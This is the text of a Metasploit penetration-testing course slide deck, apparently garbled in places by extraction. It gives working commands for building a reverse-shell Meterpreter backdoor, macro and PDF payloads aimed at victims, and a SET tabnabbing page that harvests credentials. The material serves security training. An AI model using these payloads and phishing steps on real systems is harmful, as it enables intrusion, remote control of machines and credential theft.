You are on page 1of 132

Penetration Testing

METASPLOIT

with

Course Introduction

Course Outline
Introduction to Penetration Testing

Armitage

Setting up Penetration testing Lab

Social Engineering Toolkit

Metasploit 101

PowerSploit

Meterpreter
Writing custom meterpreter scripts
Client side attacks
Exploiting client side vulnerabilities
Exploiting Browser based vulnerabilities
Post exploitation

Introduction to PENETRATION TESTING .

Introduction to Penetration Testing “Penetration testing a method of evaluating the security of a computer system or network by simulating an attack” Importance Penetration tests are valuable for several reasons Determining the feasibility of a particular set of attack vectors Identifying higher-risk vulnerabilities which could lead to security breach Identifying vulnerabilities Testing the ability of network defenders Providing evidence to support increased investments in security personal and technology .

org/ . Penetration Testing Execution Methodology • Pre-engagement Interactions • Intelligence Gathering • Threat Modeling • Vulnerability Analysis • Exploitation • Post Exploitation • Reporting Source : http://www.pentest-standard.Penetration Testing Execution Standard PTES ( Penetration Testing Execution Standard) Aimed to provide security standards for business organizations and security service providers Laid standard for performing penetration test (Beta) .

Pre-Engagement Interactions • Mainly involves with client interaction • Engagement Interactions • Agenda focuses on Penetration testing Road Map • Questionnaires • Payment Terms .

Intelligence Gathering • Main attribute is reconnaissance( Information Gathering ) in Penetration Test • Reflects other stages of Penetration Testing • Different tools and scripts will be used for different platforms for Information Gathering .

Threat Modeling Depends on Intelligence gathered information and the pre-engagement information Methodology Business Asset Analysis Business Process Analysis Threat Agents/Community Analysis Threat Capability Analysis Motivation Modeling Finding relevant news of comparable Organizations being compromised .

need to analyze and exploit threats • Directly reflects in exploitation phase .Vulnerability Analysis • Involves in discovering flaws in target system • Different tools and scripts will be used for performing vulnerability analysis on different platforms • Threat level classification need to be created for exploitation phase • Priority should be given for threat level.

Exploits target with appropriate exploit & with compatibility check Pentester need to evade security systems. need to bypass and trigger the exploit for successful exploitation .Exploitation Completely depends on vulnerability analysis phase & mainly focus on target exploitation.

Post Exploitation Involves extending attack Pen-tester can analyze further information during post exploitation Might include juicy information Using post exploitation phase attacker can enhance his persistency over the compromised system .

exploitation and post exploitation has done Based on reporting technical team can further move towards patch management.Reporting Consists of Penetration testing executive summary and technical report. general findings. . recommendation summary and road map Technical report carries out how vulnerability analysis. Executive summary mainly focuses on threat level severity.

Setting up PENETRATION TESTING Lab .

Setting up Penetration Lab • Will be focusing on creation of our own virtual test beds & third party one’s • Every Test Bed is been added with multiple vulnerabilities • Everything will be on safe side (No Loss) • Running with different set of operating systems with different set of configurations with added vulnerabilities .

Lab Setup Overview .

including but not limited to a virtual computer hardware platform. --Wikipedia Requirements for creating virtualization environment Virtualization software (Virtuabox. Hypervisior) RAM(Minimum 4GB) Virtual Test beds or Operating system’s installer iso images Good processer above 2. operating system (OS). in computing.Virtualization Virtualization. or computer network resources. storage device.8GHz . refers to the act of creating a virtual (rather than actual) version of something. Vmware.

Buzz Words Host Operating system The main operating system which got installed in a computer system Guest Operating system Any operating system which got installed by using virtualization software Snapshot Clone Saving state of a virtual machine Copy state of a virtual machine .

Installing and Setting up Virtual Lab .

Snapshot and Cloning .

METASPLOIT 101 .

Architecture.Metasploit 101 • Introduces Metasploit Framework • Buzzwords. Interfaces and Modules • Scope for exploiting target vulnerability using in built exploits and payloads . Framework Architecture.

Payload Actual Code that lets an attacker to gain access after exploitation . Exploit Code which works on the target vulnerability system.Buzz Words Vulnerability Weakness existed in a system which could be compromised.

Penetration Testing using Metasploit Widely used Tool for Development and Testing Vulnerabilities Buzzing word security community Used for Penetration Testing IDS signature development Exploit Development .

Why we need Opt Metasploit Widely accepted tool for the Testing vulnerabilities Makes complex tasks more ease Posses rich set of modules organized in systematic manner Has Regular updates Contains different types 1000 + exploits . 200 + Payloads. 500+ Auxiliary Modules .

Metasploit Architecture Libraries TOOLS Interfaces REX Console CLI MSFCORE PLUGINS WEB GUI MSF BASE Armitage Modules PAYLOADS EXPLOITS ENCODERS POST-Mods Auxiliary .

com/redmine/projects/framework/wiki/Exploit_Ranking . LowRanking 3. GoodRanking 6. ManualRanking 2. ExcellentRanking Source : https://dev.Exploits Actual code which works on the target vulnerability system. NormalRanking 5. MSF has modular organization of exploits based on OS and service classification Exploit Ranking Values 1. AverageRanking 4.metasploit. GreatRanking 7.

.

then AverageRanking should be used 4.metasploit.Exploits Ranking 1. NormalRanking : Exploit is otherwise reliable. ExcellentRanking: Exploit will never crash the service Source : https://dev. ManualRanking : Exploit is so unstable or difficult to exploit and is basically a DoS 2. but depends on a specific version and can't reliably auto-detect 5.com/redmine/projects/framework/wiki/Exploit_Ranking . GreatRanking : Exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check 7. AverageRanking : Exploit is generally unreliable or difficult to exploit. GoodRanking : Exploit has a default target and it is the "common case" for this type of software 6. LowRanking : Exploit is nearly impossible to exploit (or under 50%) for common platforms 3.

Payloads Payloads Singles Self contained ones does specific task Stagers Bridges connection Establishment Stages payload components that are downloaded by Stagers modules .

.

Enhance attack in the targeted environment Can be extended in pivoting stage MSF has inbuilt and external scripts to perform Post Exploitation Varied for Different OS types .Post Exploitation Critical component of penetration test. Assist pen tester to gather information about exploited system.

.

.. Example : Scanning for available directories existed in webserver ..Auxiliary Modules MSF Auxiliary contains wide variety modules related to different services used for doing specific tasks Auxiliary Modules admin crawlers scanners fuzzers sniffers .

.

MSF Tools and Plugins MSF contains inbuilt and third party tools for which are widely used during regular Pentests during runtime Importing Nessus scan report. later which can be used for launching attack based on report Inbuilt MSF tools comes handy especially during post exploitation phase Ex: memdump .

MSF Tools .

MSF Plugins .

MSF Interfaces Console Armitage WEB CLI GUI .

Present Scenario .

If exploit and payload gets executed .

Meterpreter .

Meterpreter .

Meterpreter Meterpreter > Its a default Goto Payload for Windows Provides Enhanced Command Shell for the attacker Consists of default set of core commands Can be extended at runtime by shipping DLLs on the Victim machine Provides basic post-exploitation API .

Working of Meterpreter Getting a Meterpreter shell undergoes 3 different stages sends exploit + Stage 1 Payload sends DLL injection payload Meterpreter DLL starts communication .

Working with Meterpreter Covers usage of Meterpreter • Meterpreter basics • Core Commands • File System Commands • Networking Commands • System Commands • User Interface Commands .

168.exe root@kali:# apachectl start Stage : 2 Enabling listener to connect back to attackers machine root@kali:# msfconsole msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST 192.206.Launching Attack Stage : 1 Creating Executable Backdoor msfpayload windows/meterpreter/reverse_tcpLHOST=192.168.206.159 LPORT=44444 X >/var/www/evil.159 msf > set LPORT 44444 msf > exploit .

Present Scenario .

If exploit and payload gets executed .

Core Commands .

File System Commands .

Networking Commands .

System Commands .

User Interface Commands .

Client Side Attacks .

Client Side Attacks .

Introduction to Client Side Attacks Targets on exploitation of client side vulnerabilities Crack perimeter from the client side work environment Includes : Email Java Office suite 3rd party applications Browsers Whole agenda focus on client side exploitation :Client side software's Exploiting Vulnerable services Exposed to Hostile Servers .

Lab Environment Contains different set of Operating systems Preconfigured and added vulnerabilities Scenario based • Different stages • Security levels • Goal is to Pwn .

Agenda Exploiting : • Software based vulnerabilities • Web based vulnerabilities • Browser based vulnerabilities .

Introduction to Client Side Attacks Level PATCHED ANTIVIRUS FIREWALL STAGE 1 NO NO NO STAGE 2 NO NO YES STAGE 3 NO YES YES STAGE 4 YES YES YES .

Stage -1 Level PATCHED ANTIVIRUS FIREWALL STAGE 1 NO NO NO .

Stage -1
Level

PATCHED

ANTIVIRUS

FIREWALL

STAGE 1

NO

NO

NO

Attacker creates a Backdoor and deploys on unprotected system, where
Anti Virus : Absent
Updates : Absent
Firewall

: Absent

Stage -1
Level

PATCHED

ANTIVIRUS

FIREWALL

STAGE 1

NO

NO

NO

Stage : 1 Creating Executable Backdoor
msfpayload windows/meterpreter/reverse_tcpLHOST=192.168.206.159 LPORT=44444 X >/var/www/evil.exe
root@kali:# apachectl start
Stage : 2 Enabling listener to connect back to attackers machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit

Time for Demo

Victim
Attacker

Exploiting Client Side Vulnerabilities .

Exploiting Client-Side Vulnerabilities Agenda • Introduction to MSF Payloads • Exploiting MS-Office suite programs using custom macros • Msfpayload. Msfencode. Msfvenom • Exploiting word and PDF documents • Introduction to Binary payloads • Introduction to veil frame work • Creating custom Binary payload types • Analyzing custom Binary payloads using Veil framework • File Format Exploits • Porting exploits and exploiting client side vulnerabilities • Encoding payloads into VBA code • Making persistent backdoors .

.Introduction to MSF Payloads MSF contains different payloads with different set of options Inbuilt with custom set of commands Everything depends on payload suppleness Focus on Exploit development and Exploitation on different OS platforms depending on vulnerability existence.

Msfpayload. Msfencode module helps in avoid of bad characters. Msfencode. shellcode generation in different formats. shellcode which is deployed or else passing in a network Might lead to AV / IDS & IPS detection. Msfvenom Msfpayload Msfpayload module is used for creating custom executables. Msfencode Shellcode generated by msfpayload contains null characters. Msfvenom Msfpayload Msfencode Msfvenom .

Binary Payload Developed by using msfpayload Requires bit of social engineering Attacker need to create an exe file and send it to victim machine On attacker side listener should be enable When ever victim opens up exe connection gets establishes .

206.159 msf > set LPORT 44444 msf > exploit .159 LPORT=44444 X >/var/www/evil.168.206.DEMO Stage : 1 Creating Executable Backdoor msfpayload windows/meterpreter/reverse_tcpLHOST=192.168.exe root@kali:# apachectl start Stage : 2 Enabling listener to connect back to attackers machine root@kali:# msfconsole msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST 192.

Exploiting File Format Vulnerabilities Users desktop environment contains various software applications and networking services Might contain outdated application or poorly configured security services Client side exploitation can be easily done by using any one of the following : Email Java Office suite 3rd party applications Browsers .

Exploiting MS-Office Suite Programs .

168.132 lport= 443 -e shikata_ga_nai -i 5 -f vba > vba.Shellcode execution in MS-Office Macros Stage : 1 Creating shellcode + payload msfvenom -p windows/meterpreter/reverse_tcp LHOST= 192.159.132 msf > set LPORT 443 msf > exploit .168.txt Stage : 2 Enabling listener to connect back to attackers machine root@kali:# msfconsole msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST 192.159.

Exploiting PDF Documents .

168.132 Msf>set LPORT 4444 Msf>exploit .Exploiting PDF Documents Msf>use exploit/windows/fileformat/adobe_pdf_embedded_exe Msf>set payload windows/meterpreter/reverse_tcp Msf>set LHOST 192.132 Msf>set LPORT 4444 Msf>set INFILENAME /root/password.168.pdf SHARE THE PDF FILE WITH VICTIM Msf>use exploit/multi/handler Msf>set payload windows/meterpreter/reverse_tcp Msf>set LHOST 192.159.159.

Exploiting Software Based Vulnerabilities .

Exploiting Software based Vulnerabilities Agenda • Introduction to software based vulnerabilities • Analyzing how to exploit fully patched system • Analyzing and exploiting software vulnerabilities .

com/ .Introduction to software based vulnerabilities Targets on exploitation of client side vulnerabilities Crack perimeter from the client side work environment Whole agenda focus on client side exploitation :Client side software's Exploiting Vulnerable services Source : http://www.exploit-db.

Analyzing how to exploit fully patched machine Le v e l P A T C H ED A N T I VI R U S FI R E W A L L STAGE 1 NO NO NO STAGE 2 NO NO YES STAGE 3 NO YES YES STAGE 4 YES YES YES .

Analyzing how to exploit fully patched machine Lets check for any vulnerable service running on the victims machine We will exploit core software based vulnerabilities .

.

Victim Environment .

Analyzing and Exploiting Vulnerability .

Analyzing and Exploiting Vulnerability .

Exploiting

Browser Based
Vulnerabilities

Exploiting Browser based Vulnerabilities
Agenda
• Introduction to browser based vulnerabilities
• Exploiting browser based vulnerabilities using Metasploit
• Introduction to Browser Exploitation Framework (BeEF)
• Installing and Configuring Beef on attacker machine
• Exploiting browser based vulnerabilities using BeEF

Introduction to Browser Attacks
A browser exploit is a form of malicious code that takes advantage of a flaw or vulnerability in an
operating system or piece of software with the intent to breach browser security to alter a user's browser
settings without their knowledge. Malicious code may exploit ActiveX, HTML, images, Java, JavaScript,
and other Web technologies and cause the browser to run arbitrary code.

-- Wikipedia

Exploitation Browser Vulnerabilities using MSF • User environment might be running with outdated browser • Victim need to browser attackers shared url • Once the victim navigates attacker Url victims machine will gets exploited and connection establishment takes place .

Exploitation Browser Vulnerabilities using MSF .

Exploitation Browser Vulnerabilities using MSF .

Exploitation Browser Vulnerabilities using MSF .

Exploitation Browser Vulnerabilities using MSF .

Browser Exploitation Framework (BeEF) Open source tool for testing and exploiting web application and browser-based vulnerabilities Testing and exploitation will be done from client side Features BeEF's modular framework allows addition of custom browser exploitation commands. The extension API allows users to change BeEF's core behavior. Source: http://en.org/wiki/BeEF . Keystroke logging Browser proxying Integration with Metasploit Plugin detection Intranet service exploitation Phonegap modules Hooking through QR codes Social Engineering modules spur user response such as entering sensitive data and responding to reminders to update software Restful API allows control of BeEF through http requests (JSON format).wikipedia.

Browser Exploitation Framework (BeEF) Architecture © BeEF Project .

132" callback_host: "192.168.159.132 Pass=abc123 root@kali: cd /usr/share/beef-xss/ root@kali: /usr/share/Metasploit-framework/.159.168.159.yaml Configuring Launching Add kali linux IP at line 18 and 26 host: "192.132" Add msf framework path at line 37 {os: 'custom'. path: '/usr/share/metasploit-framework/'} msf> load msgrpc ServerHost=192.yaml vi /usr/share/beef-xss/extensions/metasploit/config.168./beef .yaml & set Metasploit : true vi /usr/share/beef-xss/config.Installing and Configuring BeEF root@kali: apt-get update Installation root@kali: apt-get install beef-xss Edit config.

beef beef .

.

Time for Demo .

.E.Social Engineering Toolkit S.T.

Social Engineering Toolkit Agenda • Introduction to social engineering • Introduction to SET • Installing and Configuring Social Engineering Toolkit • Working on SET modules and Launching Attacks using SET .

Social Engineering

“The human factor is truly security’s weakest link”

Kevin Mitnick

Motivation
Self Interest
Mr.X, want to access and/or modify information that is associated with a family member, colleague or even a neighbor.

Revenge
Mr.X, target a friend, colleague, organization or even a total stranger to satisfy the emotional desire for vengeance

Curiosity
Mr.X, receiving pressure from friends, family or organized crime syndicates for reasons such as financial gain,
self-interest and/or revenge

The Root Cause
People want to be helpful
Sometimes the help goes too far and they give away too much information.
People want to avoid confrontation
It's difficult for some people to ask others to prove who they are. They don't want confrontation.
People like convenience
No one wants to be put out by additional security even though it may benefit the organization.
People are messy
By nature, they leave paper around, copy multiple people on e-mail, and leak data.
People are curious.
A great example is an employee who finds a USB drive in the parking lot. The first thing they do when they get to
their desk is plug it in to see what's on it.
People appeal to the senses.
Building relationship with sweet voice.

Life Cycle of Social Engineering  .

Dave Kennedy Focuses exploiting human weakness Interfaces : Command line Web .Introduction to SET Social-Engineer Toolkit (SET) created and written by the founder of TrustedSec.

Introduction to Command-line Interface .

Introduction to Web Interface .

Working on SET modules & launching attacks using SET Performing Tabnabbing attack using SET Tabnabbing Attack .

in/blog/post/a-new-type-of-phishing-attack/ . It's like being hit by the wrong end of the sword.Introduction to Tabnabbing "It can detect that you're logged into Citibank right now and Citibank has been training you to log into your account every 15 minutes because it logs you out for better security.azarask.” Aza Raskin http://www.

html Index2.txt script.Behind Curtains Attacker user customized scripts and hosting service to pretend it as a original page.php Log.html Tabnab.js Log.php Script.html Index-1.txt Hosting site Script.html .js Index-2. How to do it Index1.

Site Cloner Enter Attackers IP Enter the url to clone Victim should open attackers url and need to switch to new tab./settoolkit 1.website Attack vectors 4. If victim supplies credentials over there it will post back to Attackers machine .website Attack vectors 2. Tabnabbing 2.Tabnabbing using SET root@kali:/cd /usr/share/set/ root@kali:/usr/share/set/ . What ever the tab opened in back will get refreshed and loads Phishing page.Social Engineering Attacks 2.

.

.

.

Captured Credentials .

Armitage .

Armitage Agenda • Introduction to Armitage • Installing and configuring Armitage • Host Management • Dynamic Workspaces • Importing Hosts • Scanning and exploiting targets • Exploit Automation .

root@kali: service postgresql start root@kali: service metasploit start root@kali: armitage .Introduction to Armitage GUI front-end for the Metasploit Framework developed by Raphael Mudge Installation and Configuring Kali Linux ships with inbuilt armitage and all the dependencies.

Launching Armitage .

Launching Armitage .

Launching Armitage .

Armitage UI .

Adding Host .

Adding Host .

Scanning Host .

Finding Attacks .

Finding Attacks .

Finding Attacks .

Launching Attack .

Launching Attack .

Compromised System .

Thank You  .